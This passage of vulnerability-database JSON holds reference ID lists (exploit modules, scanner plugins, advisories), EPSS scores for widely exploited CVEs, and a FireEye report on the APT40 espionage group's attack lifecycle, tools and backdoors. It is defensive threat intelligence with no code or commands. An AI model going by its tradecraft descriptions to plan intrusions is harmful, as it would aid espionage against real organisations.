"62ED9EA6-B108-5F5A-B611-70CC6C705459", "637FA72A-45F0-5611-85EB-A28965CFDB93", "6787DC40-24C2-5626-B213-399038EFB0E9", "721C46F4-C390-5D23-B358-3D4B22959428", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77A82210-BA24-58B5-8539-C0177DA9E1FB", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A4F881D3-85FA-580E-9465-AA77CE5B7390", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B2FBA40E-C397-5DC8-8BF4-FA5BCB824172", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C0A0F6D6-A203-5F8D-819A-40B5B23B0223", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D93AD4F3-228E-5F05-A21F-9D852E25F569", "DC044D23-6D59-5326-AB78-94633F024A74", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "FC802471-7CE1-5444-80E9-9DB49BA530DD"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:212022", "H1:212985", "H1:213069", "H1:534630", "H1:536134", "H1:591295", "H1:617543", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:0B8823CF2C319136EC74B1EBBD7D38BE", "HIVEPRO:3D8952D1ED1ADBF8196A73CD3B7344F2", "HIVEPRO:6B816A83F1272E907442906CCA28A809", "HIVEPRO:8B19BED13F2445F04B8CD896B9AE4959", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:A2447429328461A02AB00335C0BB3EC2", "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "HIVEPRO:E73184FF060DA7208BAF888A5AF221EF"]}, 
{"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2", "HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ibm", "idList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}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", 
"IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "IMPERVABLOG:E3068E5C16504E4E7591776B5E79213F"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA10995", "KLA11024", "KLA11059", "KLA11101", "KLA11139", "KLA11191", "KLA11417", "KLA11835", "KLA11902"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4421457840699592233", "KITPLOIT:4611207874033525364", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:5494076556436489947", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:E2D2D085D282D0D49FB14A33098B68DE", "KREBS:EE70929DE902D9B233E209B73C1AD4A0", "KREBS:F0163956314C713411403F8497E4F9A4"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2018-0120"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:026284ECC22DB2D1F343F9B66686DEF9", "MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:197219DC341BA8DE850FF6435F75C3A4", 
"MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "MALWAREBYTES:21860B5266FF4C6017A8B388973F2911", "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:3A629D0DB6CE0BFDB2462C4612ED19ED", "MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6C5219B55CB625F7D9D16F7CD92E526C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DA40246EC094218998CD2BD24735C7A6", "MALWAREBYTES:E0E596B13A84774F12BFB5962B091DCE", "MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": 
["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ENDPOINT_CENTRAL_SAML_RCE_CVE_2022_47966-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:30A997667BFA925FD541E3DCB1F1DEB6", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:69455AB621A495CAB62392B8DB0987B3", "MMPC:6B8C3A836431A67926F568B51D67E59F", "MMPC:C13F25080AC9B1B34AF77630B988E9E8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:ADV180004", "MS:CVE-2017-0143", "MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2017-8759", "MS:CVE-2019-0604"]}, {"type": "mskb", "idList": ["KB2553204", "KB2664258", "KB3048019", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB4011262", "KB4011276", "KB4011604", "KB4011618", "KB4013389", "KB4014793", "KB4038781", "KB4038782", "KB4038783", "KB4038788", "KB4040955", "KB4040956", "KB4040957", "KB4040958", "KB4040959", "KB4040960", "KB4040964", "KB4040965", "KB4040966", "KB4040967", "KB4040971", "KB4040972", "KB4040973", "KB4040974", "KB4040975", "KB4040977", "KB4040978", "KB4040979", "KB4040980", "KB4040981", "KB4041083", "KB4041084", "KB4041085", "KB4041086", "KB4041090", "KB4041091", "KB4041092", "KB4041093", "KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211"]}, {"type": "msrc", "idList": ["MSRC:2EBC1615B24AC4821703C4F7C38CE463"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:30A997667BFA925FD541E3DCB1F1DEB6", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", 
"MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:A60AFC5A5E991E303E0397289A086789", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:D41D8CD98F00B204E9800998ECF8427E", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681759", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786371", "MYHACK58:62201786816", "MYHACK58:62201786819", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789305", "MYHACK58:62201789425", "MYHACK58:62201889929", "MYHACK58:62201890758", "MYHACK58:62201891024", "MYHACK58:62201891130", "MYHACK58:62201891264", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201993410", "MYHACK58:62201994299", "MYHACK58:62201994516", "MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["700055.PRM", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "DEBIAN_DLA-1325.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FLASH_PLAYER_APSA18-01.NASL", "FORTIGATE_FG-IR-22-398.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "GENTOO_GLSA-201803-08.NASL", "MACOSX_FLASH_PLAYER_APSA18-01.NASL", "MACOSX_MS15-033_OFFICE_2011.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_MSP_13001_RCE.NASL", 
"MANAGEENGINE_SERVICEDESK_MSP_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_PLUS_14004.NASL", "MS17-010.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2018-0285.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SMB_NT_MS12-027.NASL", "SMB_NT_MS15-033.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS17_SEP_4038781.NASL", "SMB_NT_MS17_SEP_4038782.NASL", "SMB_NT_MS17_SEP_4038783.NASL", "SMB_NT_MS17_SEP_4038788.NASL", "SMB_NT_MS17_SEP_4038792.NASL", "SMB_NT_MS17_SEP_4038799.NASL", "SMB_NT_MS17_SEP_4041083.NASL", "SMB_NT_MS17_SEP_WIN2008.NASL", "SMB_NT_MS18_FEB_4074595.NASL", "SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE", "NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108438", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310805062", "OPENVAS:1361412562310805063", "OPENVAS:1361412562310805064", "OPENVAS:1361412562310805165", "OPENVAS:1361412562310805166", "OPENVAS:1361412562310810676", 
"OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811321", "OPENVAS:1361412562310811322", "OPENVAS:1361412562310811323", "OPENVAS:1361412562310811324", "OPENVAS:1361412562310811325", "OPENVAS:1361412562310811326", "OPENVAS:1361412562310811671", "OPENVAS:1361412562310811757", "OPENVAS:1361412562310811759", "OPENVAS:1361412562310811816", "OPENVAS:1361412562310811820", "OPENVAS:1361412562310811827", "OPENVAS:1361412562310811828", "OPENVAS:1361412562310811829", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310812683", "OPENVAS:1361412562310812684", "OPENVAS:1361412562310812685", "OPENVAS:1361412562310812686", "OPENVAS:1361412562310812687", "OPENVAS:1361412562310812688", "OPENVAS:1361412562310812689", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325", "OPENVAS:1361412562310902829", "OPENVAS:902829"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUJUL2017"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112176", "PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:142181", "PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:142548", "PACKETSTORM:143164", "PACKETSTORM:144148", "PACKETSTORM:145226", "PACKETSTORM:146236", 
"1337DAY-ID-29119", "1337DAY-ID-29702", "1337DAY-ID-30119", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-30431", "1337DAY-ID-30432", "1337DAY-ID-33140", "1337DAY-ID-33313", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33895", "1337DAY-ID-33951", "1337DAY-ID-38189", "1337DAY-ID-38193", "1337DAY-ID-38195"]}]}, "epss": [{"cve": "CVE-2012-0158", "epss": 0.97314, "percentile": 0.99769, "modified": "2023-05-01"}, {"cve": "CVE-2015-1641", "epss": 0.96944, "percentile": 0.99538, "modified": "2023-05-01"}, {"cve": "CVE-2017-0143", "epss": 0.97391, "percentile": 0.99846, "modified": "2023-05-02"}, {"cve": "CVE-2017-0199", "epss": 0.97449, "percentile": 0.99908, "modified": "2023-05-01"}, {"cve": "CVE-2017-11882", "epss": 0.9743, "percentile": 0.99887, "modified": "2023-05-02"}, {"cve": "CVE-2017-5638", "epss": 0.97548, "percentile": 0.99991, "modified": "2023-05-01"}, {"cve": "CVE-2017-8759", "epss": 0.97356, "percentile": 0.99803, "modified": "2023-05-02"}, {"cve": "CVE-2018-4878", "epss": 0.9749, "percentile": 0.99948, "modified": "2023-05-02"}, {"cve": "CVE-2018-7600", "epss": 0.97571, "percentile": 0.99998, "modified": "2023-05-01"}, {"cve": "CVE-2019-0604", "epss": 0.97436, "percentile": 0.99894, "modified": "2023-05-02"}, {"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}], "vulnersScore": 10.0}, "_state": {"score": 1695455243, "dependencies": 1695454967, "epss": 0}, "_internal": {"score_hash": "14f16c0b6e2bf2c8cb281d5a1d66c2d0"}}
{"fireeye": [{"lastseen": "2020-10-02T10:01:23", "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately support China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. 
Most recently, this has included [victims with connections to elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road Initiative. China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\n \nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. 
All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\n \nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. 
This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). 
For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detection by leveraging legitimate websites, such as GitHub, Google, and Pastebin, for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. 
We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "cvss3": {}, "published": "2019-03-04T13:00:00", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "modified": "2019-03-04T13:00:00", "id": 